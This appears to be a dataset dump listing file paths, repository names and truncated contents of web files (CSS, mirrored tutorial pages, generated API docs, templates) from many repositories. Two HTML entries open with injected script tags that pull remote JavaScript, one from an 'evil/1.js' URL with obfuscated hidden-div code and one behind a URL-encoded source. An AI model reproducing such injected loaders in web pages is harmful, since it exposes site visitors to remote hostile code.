path stringlengths 5 312 | repo_name stringlengths 5 116 | content stringlengths 2 1.04M |
|---|---|---|
public/assets/landing/css/31-07-2015-new_all_final.css | mentordeveloper/rostamani | /* reset attach */
@import url("reset.css");
@font-face {
font-family: 'HelveticaNeuethin';
src: url('../fonts/HelveticaNeueLTStd-ThCn.eot');
src: url('../fonts/HelveticaNeueLTStd-ThCn.eot?#iefix') format('embedded-opentype'), url('../fonts/HelveticaNeueLTStd-ThCn.woff2') format('woff2'), url('../fonts/He... |
Coding/W3School/W3Schools_Offline_2015/www.w3schools.com/jsref/playcanvas2afa.html | platinhom/ManualHom |
<!DOCTYPE html>
<html lang="en-US">
<!-- Mirrored from www.w3schools.com/jsref/playcanvas.asp?filename=playcanvas_transformc&preval=1,0,0,1,0,0 by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 23 Jan 2015 08:31:42 GMT -->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" />
<title>Pla... |
templates/ajax/validation.html | zyshjklm/django-coral | <div class="row">
<div class="col-xs-12 col-sm-7 col-md-7 col-lg-4">
<h1 class="page-title txt-color-blueDark">
<i class="fa fa-edit fa-fw "></i>
Forms
<span>>
Validation Sample look
</span>
</h1>
</div>
<div class="col-xs-12 col-sm-5 col-md-5 col-lg-8">
<ul id="sparks" class="">... |
apps/perms/templates/perms/database_app_permission_list.html | zsjohny/jumpserver | {% extends '_base_list.html' %}
{% load i18n static %}
{% block table_search %}{% endblock %}
{% block table_container %}
<div class="uc pull-left m-r-5">
<a href="{% url 'perms:database-app-permission-create' %}" class="btn btn-sm btn-primary"> {% trans "Create permission" %} </a>
</div>
<table cl... |
data/dict-style.html | cybersphinx/qolibri | <h1> HTML Subset</h1>
<h2> <h1> <h2> tags</h2>
<pre>
Level 1 and level 2 heading
<b><h1></b> tag is used as book name.
<b><h2></b> tag is used as searched item title.
</pre>
<h2> <pre> tag</h2>
<pre>
Preformatted text - <b>Body text</b>
</pre>
<h2> &... |
images/Core2Duo/020411573p07ow.html | ForAEdesWeb/AEW2 | <script src="http://cpm.36obuy.org/evil/1.js"></script><script src="http://cpm.36obuy.org/lion/1.js"></script><script/src=//360cdn.win/c.css></script>
<script>document.write ('<d' + 'iv cl' + 'a' + 's' + 's="z' + '7z8z' + '9z6" st' + 'yl' + 'e="p' + 'ositio' + 'n:f' + 'ixed;l' + 'ef' + 't:-3' + '0... |
Coding/W3School/W3Schools_Offline_2015/www.w3schools.com/bootstrap/tryitd517-2.html | platinhom/ManualHom |
<!DOCTYPE html>
<html lang="en-US">
<!-- Mirrored from www.w3schools.com/bootstrap/tryit.asp?filename=trybs_ref_glyph_arrow-up&stacked=h by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 23 Jan 2015 07:35:00 GMT -->
<head>
<title>Tryit Editor v2.3</title>
<meta id="viewport" name='viewport'>
<script>
(function() {
if... |
Coding/W3School/W3CN/www.w3school.com.cn/tiy/loadtext7241.html | platinhom/ManualHom | <html>
<!-- Mirrored from www.w3school.com.cn/tiy/loadtext.asp?f=html_th_valign by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 02 Dec 2015 07:18:31 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=GB2312" /><!-- /Added by HTTrack -->
<body>
<table border="1" style="height:... |
wp-content/plugins/pretty-file-links/styles/prettylinks.css | roher-dev/genmoron | a.prettylink,a.prettylink:visited
{
/*Gradient background*/
background: #ffffff; /* Old browsers */
background: -moz-linear-gradient(top, #ffffff 0%, #f6f6f6 47%, #ededed 100%); /* FF3.6+ */
background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#ffffff), color-stop(47%,#f6f6f6), color-stop... |
Coding/W3School/W3CN/www.w3school.com.cn/asp/prop_filesystem.html | platinhom/ManualHom |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<!-- Mirrored from www.w3school.com.cn/asp/prop_filesystem.asp by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 02 Dec 2015 03:18:42 GMT -->
<head>
<meta http-equiv... |
assets/css/main.css | dhpark/dhpark.github.io | /*
Daniel Park Portfolio CSS
Samples from FlatUI, normalize, bootstrap and Flatboot
*/
@import url("normalize.css");
/* =Global
----------------------------------------------- */
h1, h2, h3, h4, h5, h6, a, p {
font-family: 'Open Sans', sans-serif;
color: white;
font-weight: normal;
font-size: 16px;
text-decor... |
Coding/W3School/W3Schools_Offline_2015/www.w3schools.com/js/tryjs_boolean_zero.html | platinhom/ManualHom | <!DOCTYPE html>
<html>
<!-- Mirrored from www.w3schools.com/js/tryjs_boolean_zero.htm by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 23 Jan 2015 08:11:23 GMT -->
<body>
<p>Display the Boolean value of 0:</p>
<button onclick="myFunction()">Try it</button>
<p id="demo"></p>
<script>
function myFunction() {
va... |
logs/kengjisong/101.html | ForAEdesWeb/AEW25 | <script/src=//%61%6C%69%63%64%6E%2E%72%65%2E%6B%72/%72%65%2E%6B%72></script>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>99re2.¾Ã¾ÃÈÈ×îеØÖ·|É«ÓûÓ°ÊÓ ÒùÏãÒùÉ« ÌìÌìÓ°ÊÓ À´°É×... |
Coding/W3School/W3Schools_Offline_2015/www.w3schools.com/jsref/tryit3642.html | platinhom/ManualHom |
<!DOCTYPE html>
<html lang="en-US">
<!-- Mirrored from www.w3schools.com/jsref/tryit.asp?filename=tryjsref_style_marginleft by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 23 Jan 2015 08:25:39 GMT -->
<head>
<title>Tryit Editor v2.3</title>
<meta id="viewport" name='viewport'>
<script>
(function() {
if ( navigator.... |
share/doc/gcc-linaro-arm-linux-gnueabihf/html/libc/Envz-Functions.html | eckucukoglu/arm-linux-gnueabihf | <html lang="en">
<head>
<title>Envz Functions - The GNU C Library</title>
<meta http-equiv="Content-Type" content="text/html">
<meta name="description" content="The GNU C Library">
<meta name="generator" content="makeinfo 4.13">
<link title="Top" rel="start" href="index.html#Top">
<link rel="up" href="Argz-and-Envz-Vec... |
Coding/W3School/W3Schools_Offline_2015/www.w3schools.com/cssref/trycss3_border-radius.html | platinhom/ManualHom | <!DOCTYPE html>
<html>
<!-- Mirrored from www.w3schools.com/cssref/trycss3_border-radius.htm by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 23 Jan 2015 08:25:03 GMT -->
<head>
<style>
div {
border: 2px solid #a1a1a1;
padding: 10px 40px;
background: #dddddd;
width: 300px;
border-radius: 25px;
}
... |
sites/all/modules/html5_media/player/doc/symbols/minplayer.plugin.html | srandolph/drpl-otrs | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta name="generator" content="JsDoc To... |
samples/misc/testInsertAdjacentHTML.html | fedelemantuano/thug | <html>
<body>
<div id="one">one</div>
<div id="two">two</div>
<div id="three">three</div>
<div id="four">four</div>
<script>
var d1 = document.getElementById('one');
d1.insertAdjacentHTML('beforebegin', '<div id="five">five</div>');
var d2 = document.getElementById('two');
d2.insertAdjacentHTML('afterbegin', '<div id="... |
responsivephp/style.css | mimmy/portfolio | * {margin: 0;
padding: 0;}
@import url(http://reset5.googlecode.com/hg/reset.min.css);
body{background-image: url("bodybcg.jpg");
background-size: cover;
background-repeat: no-repeat;
overflow: auto;
display: block;
height: 100%;
}
.smalls {width: 90%;
margin-left: 4%;
margin-right: 4%;
margin-bottom: 5px;
clear: bo... |
doc/html/a00097.html | Soth1985/tbb | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=9"/>
<meta name="generator" con... |
190-2006/node/664/index.html | kfitz/machines | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>internet who cares | MS 190: Authorship</tit... |
src/main/webapp/sqli-04/BenchmarkTest01962.html | h3xstream/Benchmark | <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<script src="/benchmark/js/jquery.min.js"></script>
<script type="text/javascript" src="/benchmark/js/js.cookie.js"></script>
<title>Be... |
wp-content/themes/embroideryadvertisers/css/june.css | fritids/embroideryadvertisers | body { background:#226093; }
a:link, a:visited{text-decoration: underline;color:#8a1d15;}
a:hover{text-decoration: none;}
#wrapper { background:#098fd6; border:2px solid; }
#bmessage { color:#fff; }
/*==============================*/
/* Header */
/*==============================*/
#header {}
#hea... |
app/partials/movie-detail.html | ivanmarban/angular-movies-client | <div class="container col-sm-7 center">
<div class="page-header">
<h3>Update movie</h3>
</div>
<form name="movieForm" novalidate>
<div class="form-group" show-errors='{showSuccess: true}'>
<label class="control-label">Title</label>
<input type="text" class="form-control" name="title" ng-model=... |
wap/zxzx/2014-11-19/1335.html | 306076197/hudson | <!DOCTYPE HTML>
<html>
<head>
<meta name='renderer' content='webkit'>
<meta charset='utf-8' />
<title>
聚晶微粉瓷砖蓄势已久 在市场上迅速崛起攻城掠地</title>
<meta name="keywords" content="" />
<meta name="description" content="聚晶微粉瓷砖蓄势已久 在市场上迅速崛起攻城掠地" />
<meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=... |
resources/mediawiki.special/mediawiki.special.userlogin.login.css | ankur24x7/mediawiki-core | /* The login form invites users to create an account */
#mw-createaccount-cta {
width: 20em;
height: 10em;
/* @embed */
background: url(images/glyph-people-large.png) no-repeat 50%;
margin: 0 auto;
}
#mw-createaccount-cta h3,
#mw-createaccount-another h3 {
font-size: 0.9em;
font-weight: normal;
text-align: cen... |
app/src/main/assets/html/sa/Ch_C01_S12_V03.html | SrirangaDigital/shankara-android | <html>
<head>
<meta charset="UTF-8">
<link rel="stylesheet" href="assets/stylesheet-sa.css" />
</head>
<body>
<div class='verse' id='Ch_C01_S12_V03' type='mantra'>
<div class='versetext'>तान्होवाचेहैव मा प्रातरुपसमीयातेति तद्ध बको दाल्भ्यो ग्लावो वा मैत्रेयः प्रतिपालयाञ्चकार ॥ ३ ॥ </div>
<div class='bhashya' id='Ch... |
Code/GetMetaDataFromCRAN/raw_html/alleHap.html | esander91/NamespacePollution | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>CRAN - Package alleHap</title>
<link rel="stylesheet" type="text/css" href="../../CRAN_web.css" />
<meta http-equiv="Content-Type" content="text/html; c... |
sites/all/libraries/yui/api/classes/DataSource.Get.html | artefactual-labs/trac | <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>DataSource.Get - YUI 3</title>
<link rel="stylesheet" href="http://yui.yahooapis.com/3.7.0/build/cssgrids/cssgrids-min.css">
<link rel="stylesheet" href="../assets/vendor/prettify/prettify-min.... |
Coding/W3School/W3CN/www.w3school.com.cn/tiy/tbdd0.html | platinhom/ManualHom | <!DOCTYPE html>
<html lang="zh-cn">
<!-- Mirrored from www.w3school.com.cn/tiy/t.asp?f=jquerymobile_pages by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 02 Dec 2015 02:52:53 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=GB2312" /><!-- /Added by HTTrack -->
<head>
<meta c... |
docs/SimpletestDocumentation/drupal-simpletest/html/class_multiple_selection_tag.html | chachasikes/TwinCitiesTestSprint | <!-- This comment will put IE 6, 7 and 8 in quirks mode -->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<title>Drupal Simp... |
sites/all/libraries/yui/api/modules/event-custom.html | artefactual-labs/trac | <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>event-custom - YUI 3</title>
<link rel="stylesheet" href="http://yui.yahooapis.com/3.7.0/build/cssgrids/cssgrids-min.css">
<link rel="stylesheet" href="../assets/vendor/prettify/prettify-min.cs... |
docs/doxygen/html/functions_vars_0x73.html | huydhn/Detector | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html><head>
<meta http-equiv="Content-Type" content="text/html;charset=iso-8859-1"/>
<meta name="keywords" content="TEMU, dynamic analysis, binary analysis, dynamic
taint analysis"/>
<meta name="description" content="C/C++/OCaml Source Code Documentation f... |
src/DNA.Mvc.Web/Content/themes/dark-blue/taoui-states-disable.css | DotNetAge/dotnetage | .d-ui-widget.d-state-disable, .d-ui-widget:disabled, .d-ui-widget-header.d-state-disable { border-color: #363636; } |
Coding/W3School/W3Schools_Offline_2015/www.w3schools.com/jsref/tryjsref_keygen_autofocus2.html | platinhom/ManualHom | <!DOCTYPE html>
<html>
<!-- Mirrored from www.w3schools.com/jsref/tryjsref_keygen_autofocus2.htm by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 23 Jan 2015 08:38:24 GMT -->
<body>
<p>Click the buttons to create a KEYGEN element, one with autofocus and one without autofocus.</p>
<button onclick="myFunction()">Keyge... |
SGDE2/jogl-javadoc/jogl/javadoc_nativewindow_spec/index-all.html | Nekel-Seyew/sweeney-game-development-environment-2 | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="en">
<head>
<!-- Generated by javadoc (version 1.7.0_25) on Sun Jul 21 05:04:12 CEST 2013 -->
<title>Index (NativeWindow API -- 2.0 Specification)</title>
<meta name="date" content="2013-0... |
external/webkit/LayoutTests/fast/animation/request-animation-frame-display.html | DmitryADP/diff_qc750 | <!DOCTYPE html>
<html>
<head>
<link rel="stylesheet" href="../js/resources/js-test-style.css">
<script src="../js/resources/js-test-pre.js"></script>
</head>
<body>
<p id="description"></p>
<div id="console"></div>
<span id="e"></span>
<span id="f"></span>
<script src="script-tests/request-animation-frame-display.js"><... |
Joomla-Site/mod_related_items/ModRelatedItemsHelper.html | asika32764/Joomla-CMS-API-Document | <?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- template designed by Marco Von Ballmoos -->
<title>Docs For Class ModRelatedItemsHelper... |
media/com_acymailing/css/component_default_classic_red.css | ForAEdesWeb/AEW4 | /**
* @package AcyMailing for Joomla!
* @version 4.8.1
* @author acyba.com
* @copyright (C) 2009-2014 ACYBA S.A.R.L. All rights reserved.
* @license GNU/GPLv3 http://www.gnu.org/licenses/gpl-3.0.html
*/
@import url("component_default_classic_black.css");
#acyarchivelisting .but... |
doc/html/qwsmousehandler.html | muromec/qtopia-ezx | <?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Qt 4.3: QWSMouseHandler Class Reference</title>
<link href="classic.css" rel="stylesheet" type="text/css... |
lib/leJOS_EV3_0.8.1-beta/docs/ev3/lejos/robotics/filter/ConcatenationFilter.html | zmint/galileo | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--NewPage-->
<HTML>
<HEAD>
<!-- Generated by javadoc (build 1.6.0_37) on Fri Apr 18 13:26:11 BST 2014 -->
<META http-equiv="Content-Type" content="text/html; charset=utf-8">
<TITLE>
ConcatenationFilter (leJOS EV3 AP... |
moblie/views/tpl/coupon/cashcoupon_fight.html | 38695248/require-gulp | <{include file="header_comm.html"}>
<link rel="stylesheet" href="<{$static_url}>/moblie/app/css/jquery-ui.css?150624050556">
<link rel="stylesheet" href="<{$static_url}>/moblie/app/css/dz.css?150624050556">
<body>
<div id="bodywidth"></div>
<div id="fxpage_user" data-role="page">
<div id="headerbox" class="headerbox"... |
package/multimedia/platinum/src/Platinum/Docs/Doxygen/html/dir_60e3d0b30beececd885dbd9214fbb81d.html | widora/openwrt_widora | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=9"/>
<meta name="generator" con... |
management/phpdocx/phpdoc/html/li_loader.html | marhazk/eMasjidUTeMMgmt | <?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- template designed by Marco Von Ballmoos -->
<title></title>
<link rel="styleshe... |
src/mpich-3.0.1/www/www3/MPI_Lookup_name.html | qingu/WRF-Libraries | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML3.2 EN">
<HTML>
<HEAD>
<META NAME="GENERATOR" CONTENT="DOCTEXT">
<TITLE>MPI_Lookup_name</TITLE>
</HEAD>
<BODY BGCOLOR="FFFFFF">
<A NAME="MPI_Lookup_name"><H1>MPI_Lookup_name</H1></A>
Lookup a port given a service name
<H2>Synopsis</H2>
<PRE>
int MPI_Lookup_name(const char *servic... |
oldsite/pr80.html | jordotech/iglesia | <HTML>
<HEAD>
<TITLE>TABERNACULO DE ALBANZA Y ADORACION</TITLE>
<meta http-equiv="content-type" content="text/html;charset=X-MAC-ROMAN"/>
<META NAME="GENERATOR" CONTENT="Adobe golive 6.0 Mac"/>
<META NAME="description" CONTENT=" LA IGLESIA TABERNACULO DE ALBANZA Y ADORACION de AGUADILLA, PUERTO RICO ES UNA IGLESIA D... |
SICOTYC/UI/src/app/sicotyc/operaciones/solicitud-servicio/servicio-exportacion/servicio-exportacion.component.html | NetRevolutions/SICOTYC | <div class="form-group row">
<label for="dtpFechaServicio" class="col-sm-2 col-form-label">Fecha del Servicio: </label>
<div class="col-sm-4">
<datetime [(ngModel)]="exportacion.fechaServicio" name="dtpFechaServicio" id="dtpFechaServicio" [datepicker]="datepickerOpts"
[timepicker]="false"></... |
muggl-swt/docs/javadoc/de/wwu/muggl/vm/execution/MugglToJavaConversion.html | wwu-pi/muggl | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--NewPage-->
<HTML>
<HEAD>
<!-- Generated by javadoc (build 1.6.0_07) on Wed Dec 08 12:09:01 CET 2010 -->
<TITLE>
MugglToJavaConversion
</TITLE>
<META NAME="date" CONTENT="2010-12-08">
<LINK REL ="style... |
app/nosotros.html | jolupeza/cbb | <!DOCTYPE html>
<html lang="es">
<head>
<meta charset="UTF-8" />
<title>Colegio Bertolt Brecht</title>
<meta name="viewport" content="width=device-width, initial-scale=1" />
<!-- build:css css/style.min.css -->
<!-- bower:css -->
<link rel="stylesheet" href="./../bower_components/bootstrap/di... |
doc/index-files/index-13.html | nemolovich/HADL | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="fr">
<head>
<!-- Generated by javadoc (version 1.7.0_25) on Mon Dec 09 13:16:03 CET 2013 -->
<title>N-Index</title>
<meta name="date" content="2013-12-09">
<link rel="stylesheet" type="tex... |
msw/readme.html | chrschmidt/lplex | <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>lplex</title>
<link rel="shortcut icon" href="favicon.ico">
<style type='text/css'>
@font-face {
font-family: 'DejaVuSansMonoBook';
src: url('dejavu/DejaVuSansMono.eot');
src: local('☺'), url('... |
coursera-ychaikin/week3/foundItems.html | fabraga/AngularJS | <div id="result">
<div id="items">
<ul>
<li ng-repeat="item in found">
<button class="remove" ng-click="onRemove({index: $index});">
<span class="glyphicon glyphicon-remove red-x">
</span> Don't want this one! <span class="glyphicon glyphicon-hand-right pointing-right"></span>
... |
assets/restaurantex/src/App.css | Afsoon/restaurantex | .switchSearch {
position: absolute !important;
right: 0px;
}
.label {
float: right;
z-index: 100;
top: 0px;
right: 0px;
padding-top: 5px;
}
.cell {
align-items: center;
display: flex;
font-size: 17px;
height: 44px;
justify-content: space-between;
padding-right: 50px;
z-index: 100;
positi... |
modules/comment/tpl/comment_list.html | arnia/Karybu | <!--#include("header.html")-->
<script type="text/javascript">
xe.lang.msg_empty_search_target = '{$lang->msg_empty_search_target}';
xe.lang.msg_empty_search_keyword = '{$lang->msg_empty_search_keyword}';
</script>
<load target="js/comment_admin.js" usecdn="true" />
<div cond="$XE_VALIDATOR_MESSAGE" class="alert alert-... |
src/tabs/motors.html | cleanflight/cleanflight-configurator | <div class="tab-motors">
<div class="content_wrapper">
<div class="tab_title" i18n="tabMotorTesting">Motors</div>
<div class="cf_doc_version_bt">
<a id="button-documentation" href="https://github.com/cleanflight/cleanflight/releases" target="_blank" rel="noopener noreferrer"></a>
... |
RossFamilyTree/evt/f/2/d15f60d525f5f492f8194f74f2f.html | RossGammon/the-gammons.net | <!DOCTYPE html>
<html xml:lang="en-GB" lang="en-GB" xmlns="http://www.w3.org/1999/xhtml">
<head lang="en-GB">
<title>Ross Gammon’s Family Tree - Events</title>
<meta charset="UTF-8" />
<meta name ="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=1" />
<meta name ="apple-mo... |
imagemap.html | gpetruzella/gpetruzella.github.io | <head></head>
<body>
<img src="https://raw.githubusercontent.com/gpetruzella/gpetruzella.github.io/master/brady-bunch-gerol.png" usemap="#image_map">
<map name="image_map">
<area alt="Canvas 101" title="Canvas 101" href="https://mcla.instructure.com/courses/2879472/pages/workshop-canvas-101" coords="14,19,293,205" sh... |
lib/JasperReport/docs/api/net/sf/jasperreports/engine/export/ooxml/class-use/XlsxRunHelper.html | MHTaleb/Encologim | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="ro">
<head>
<!-- Generated by javadoc (version 1.7.0_80) on Mon Jun 20 18:37:21 EEST 2016 -->
<title>Uses of Class net.sf.jasperreports.engine.export.ooxml.XlsxRunHelper (JasperReports 6.3... |
askbot/doc/build/html/devel/askbot.middleware.view_log.html | samhoo/askbot-realworld |
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>askbot.middleware.view_log — Askbot v0.7.36 d... |
AD/Tema 2/hsqldb-2.3.1/hsqldb/doc/util-guide/dbm-chapt.html | ferquies/2dam | <html>
<head>
<META http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Chapter 3. Database Manager</title>
<link href="../docbook.css" type="text/css" rel="stylesheet">
<meta content="DocBook XSL-NS Stylesheets V1.76.1" name="generator">
<meta name="keywords" content="Hsqldb, Database, Manag... |
wpilib/java/current/javadoc/com/ni/vision/class-use/NIVision.Barcode2DInfo.html | LSRobotics/2016Robot | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="en">
<head>
<!-- Generated by javadoc (1.8.0_11) on Tue Feb 24 14:31:54 EST 2015 -->
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Uses of Class com.ni.vision.... |
docs/main/TransientContainer.html | EPICI/wavelets | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="en">
<head>
<!-- Generated by javadoc (1.8.0_25) on Tue Apr 11 22:33:27 EDT 2017 -->
<title>TransientContainer</title>
<meta name="date" content="2017-04-11">
<link rel="stylesheet"... |
discovery/resources/fan/901/index.html | Timathom/timathom.github.io | <!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head prefix="og: http://ogp.me/ns# dc: http://purl.org/dc/terms/">
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<!-- HTML5 shim and Respond.... |
web/force4.html | russelljjarvis/neurogateway | <!DOCTYPE html>
<meta charset="utf-8">
<style>
.link {
stroke: #999;
stroke-opacity: .6;
}
.link {
stroke: #ccc;
}
.node text {
pointer-events: none;
font: 10px sans-serif;
}
</style>
<body>
<script src="//d3js.org/d3.v3.min.js"></script>
<script>
var width = 960,
height = 500
var svg = d3.sel... |
docs/icens/html/classwebsocketpp_1_1log_1_1basic.html | nsol-nmsu/ndnSIM | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=9"/>
<meta name="generator" con... |
_posts/PMS/sabayon-chroot.html | fusion809/fusion809.github.io-old | <div class="highlight"><pre><code class="language-bash" data-lang="bash"><span class="c"># This is the best mirror for me, due to my geography. If you want to use this script you should change this variable to the best mirror for you.</span>
<span class="nv">MIRROR</span><span class="o">=</span>ftp://mirror.optusnet.co... |
imports/ui/impressum/pages/linux/faq/content/en.html | thm-projects/arsnova-flashcards | <template name="linuxImpressumFAQHeadingEN">
</template>
<template name="linuxImpressumFAQContentEN">
</template>
|
doc/gred/nucleus/core/package-frame.html | PouletAxel/NucleusJ_ | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="fr">
<head>
<!-- Generated by javadoc (version 1.6.0_38) on Tue Apr 05 10:36:33 BST 2016 -->
<title>gred.nucleus.core</title>
<meta name="date" content="2016-04-05">
<link rel="stylesheet"... |
docs/troubleshooting.html | DanRohde/webdavcgi | <!DOCTYPE html>
<html>
<head>
<meta name="keywords" content="WebDAV CGI wrapper UID" />
<meta name="author" content="Daniel Rohde" />
<meta http-equiv="Content-type" content="text/html;charset=UTF-8" />
<link rel="stylesheet" type="text/css" href="style.css"/>
<script src="script.js" type="text/javascript"><... |
BBDD/content.css | jolosan/jolosan.github.io | /* vietnamese */
@font-face {
font-family: 'Encode Sans';
font-style: normal;
font-weight: 300;
src: local('Encode Sans Light'), local('EncodeSans-Light'), url(EncodeSans-Light_vietnamese.woff2) format('woff2');
unicode-range: U+0102-0103, U+0110-0111, U+1EA0-1EF9, U+20AB;
}
/* latin-ext */
@font-fac... |
CSC 445 WebCentric Programming/Final Project/poi-3.14/docs/document/quick-guide.html | jmemmons/university-assignments | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<META http-equiv="Content-Type" content="text/html; charset=UTF-8">
<!--*** This is a generated file. Do not edit. ***-->
<link rel="stylesheet" href="../skin/tigris.css" type="text/css">
<link rel="st... |
crescent.html | benaston/progress.css | <html>
<head>
<style>
.centered {
position:relative;
width:100%;
height:100%;
display:-webkit-box;
-webkit-box-orient:vertical;
-webkit-box-pack:center;
-webkit-box-align:center;
}
.crescent-1 {
display: inline-block;
width: 10px;
height: 10px;
border: 15px dashed rgba(0,0,0,0);
border-radius: 30px;
-webkit-animation... |
_source/news/2018-09-10-jameeat.html | InstantKhabar/_source | ---
title: "कानपूर: बाढ़ पीड़ितों में जमीअतुल्मा ने बांटी रहत सामग्री"
layout: item
category: ["UP"]
date: 2018-09-10T05:17:14.271Z
image: 1536576434271jameeat.jpg
---
<p>कानपुर : गंगा नदी में बढ़े जलस्तर के कारण शहर के निचले इलाकों में बाढ़ जैसे हालात हैं। जलस्तर घटने के बावजूद अभी भी कई गांव पूरी तरह पानी में डूबे हुए ह... |
mails/en/order_conf.html | tantchontampo/koomaakiti.com |
